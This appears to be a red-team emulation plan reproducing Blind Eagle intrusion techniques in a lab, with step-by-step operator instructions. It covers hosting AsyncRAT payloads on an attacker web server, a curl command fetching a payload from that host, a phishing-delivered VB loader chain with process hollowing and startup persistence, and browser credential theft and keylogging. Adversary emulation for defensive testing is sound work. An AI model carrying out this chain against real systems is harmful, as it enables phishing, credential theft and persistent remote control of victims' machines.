# Scenario Overview

Legend of symbols:

• 💡 - callout notes
• ❗ - extremely important note
• ➡️ - Switching to another session
• ⭕ - Sign out of something

This scenario emulates Blind Eagle TTPs based on several malware specimens either used by or associated with the Blind Eagle actors:

1. AsyncRAT

This emulation leverages AsyncRAT as a C2 server, and an attacker controlled web server to host and deliver two loaders, an injector, and the final AsyncRAT payload. AsyncRAT server is a Windows .NET GUI based program and will run on an attacker controlled Windows Machine. A second Ubuntu machine will be used as attacker infrastructure - we use Python to host a simple web server with a directory structure that aligns with CTI and hosts payloads.

❗ This emulation plan assumes the infratructure found in setup has been completed. If this has not been done then IP addresses and URLs may change.

💡 During the emulation the Exchange server mail.bancomurcielago.com was configured as an open relay and an email from notificacion@dian-info.com was sent with the PDF Notificacion De Pago attached from the attacker web machine using the Linux sendemail program. A corresponding DNS entry for dian-info.com was created on the Active Directory Domain Controller canario was also created so that the link contained in the PDF would resolve properly.

❗ If you do not wish to perform these steps downloading the payload factura-228447578537.pdf.uue from Attacker Web 192.168.0.5 to Desk1 10.1.0.5 will also suffice - you can perform the following PowerShell command from a PowerShell prompt on Desk1 during preflights:

curl http://192.168.0.5/factura-228447578537.pdf.uue -o ~\Downloads\factura-228447578537.pdf.uue

• 💡 RDP, do not SSH, to the Windows Attack Platform 192.168.0.4 hosting the C2 server.

• Open a new terminal window and navigate to where you previously cloned the repo in setup. Start the AsyncRAT server:

cd birdsofprey\Resources\Binaries\Binaries

• Start the AsyncRAT Server:

.\AsyncRAT.exe

• ➡️ Open a second PowerShell window on your Windows Attack Platform and SSH to the Web Server 192.168.0.5 to ensure the following four malicious files are in the web, Rump, and dll directories for your user:

💡 These files are all part of the Blind Eagle phishing and attack chain and will be served from attacker infrastructure.

1. factura-228447578537.pdf.uue in web
2. new_rump_vb.net.txt in web/dll
3. Rump.xls in web/Rump
4. asy.txt in web

• Check the file exists:

ls web

ls web/dll

ls web/Rump

💡 If the armed and zipped file is not there, follow the instructions for creating it then copy the zip file to ~/web.

• Start the Python Web Server in a TMUX session (this ensures if your SSH connection drops the web server will still run):

cd ~/web

tmux

sudo python3 -m http.server 80

Step 1 emulates Blind Eagle gaining initial access from the target user downloading, extracting, and executing a Visual Basic script received from a link residing in an attachment to a spearphishing email. The email is sourced from the email address notificacion@dian-info.com the following actions take place when the VB script is executed:

1. The script uses PowerShell to download new_rump_vb.net.txt (fiber.dll) from 192.168.0.5/dll.
2. The script then loads fiber.dll into the current Application Domain.
3. Once loaded the VAI method is called passing in an obfuscated URL pointing to the AsyncRAT payload (asy.txt).
4. fiber.dll creates an artifact in C:\Windows\Temp called OneDrive.vbs which is a copy of the VB loader.
5. fiber.dll uses the WebClient.DownloadString method to download Rump.xls (fsociety.dll).
6. fiber.dll uses Strings.StrReverse and Replace to unmangle Rump.xls.
7. fiber.dll uses Strings.StrReverse and Replace to unmangle the URL pointing to asy.txt (AsyncRAT payload).
8. fiber.dll uses webClient.DownloadString and StrReverse to download and unmabgle asy.txt.
9. fiber.dll uses AppDomain.CurrentDomain.Load and Convert.FromBase64String to load Rump.xls (fsociety.dll) into the current Application Domain and executes the Ande method of the fsociety.Tools Class passing in two arguments: The path to RegSvcs.exe and the contents of asy.txt with Base64 encoding removed.
10. fsociety.dll performs process hollowing to inject AsyncRAT into RegSvcs.exe
11. fiber.dll calls the startup method of the fiber.Optical class. This leverages the Windows Script Host to establish persistence by creating an lnk file in the Users startup folder pointing to the previously dropped OneDrive.vbs in C:\Windows\Temp

➡️ RDP into Desk1 (10.1.0.5):

• Open Edge and browse to https://mail.bancomurcielago.com/owa, login as demo_admin:

💡 There should be an unread email from notificacion@dian-info.com.

• Open this email and download the PDF attachment.

• Open the PDF and click the link to download factura-228447578537.pdf.uue

• Open File Explorer and navigate to the Downloads file directory.

• Right click factura-228447578537.pdf.uue and use winRAR to unzip - when prompted enter the password found in the PDF email attachment

• Double click the extracted factura-228447578537.pdf.vbs to execute the first stage and kick off the infection chain.

❗ Wait 30 seconds.

• Return to your RDP session on Windows Attack Platform to ensure AsyncRAT called back

• 🔍 The C2 server should register a new AsyncRAT callback after the script is executed.

Step 2 emulates Blind Eagle performing browser credential theft leveraging the AsyncRAT Recovery plugin.

Blind Eagle is known to monitor the current loaded window and look for strings such as banking websites and other financial institution websites. The user has a session to a Bank website open so Blind Eagle attempts to steal both saved passwords and cookies from the browser.

➡️ On Windows Attack Platform 192.168.0.4 bring the AsyncRAT server window into focus.

In the AsyncRAT Server window issue the following command to the AsyncRAT Client.

Right Click AsyncRAT Client -> Monitoring -> Password Recovery

Once the recovery process completes review the results on the AsyncRAT server and look for credentials in the resulting txt file.

Right click AsyncRAT client -> Client Management -> Client -> Show Folder

This will open a File Explorer window with files named Cookies_<date> and Password_<date>. Open the Passwords file to verify credential collection

Step 3 emulates Blind Eagle using the keylogging plugin for AsyncRAT to capture credentials from the victim machine.

➡️ On Windows Attack Platform issue the following commands to deploy the keylogger to the victim workstation:

In the AsyncRAT Server window Right click client -> Monitoring -> Keylogger

A second window will open on the AsyncRAT server indicating that keylogging is running.

➡️ RDP from your workstation not the Attack Platform as demo_admin to Desk1 (this is so it does not appear that the attacker RDP'ed to the victim). On Desk1 (10.1.0.5) open an Edge browser window and navigate to web.bancomurcielago.com:8000/admin/login. Enter the username administrador-murcielagos and password N@N@N@N@Murci31@g0 to log in to the Django server.

➡️ Switch to the Windows Attack Machine, you should see the administrator username and password show up in the keylogging window indicating a successful capture of credentials.

Verify that the credentials were successfully captured by opening up a browser window and navigating to http://10.1.0.4:8000/admin/login and authenticating with the captured credentials.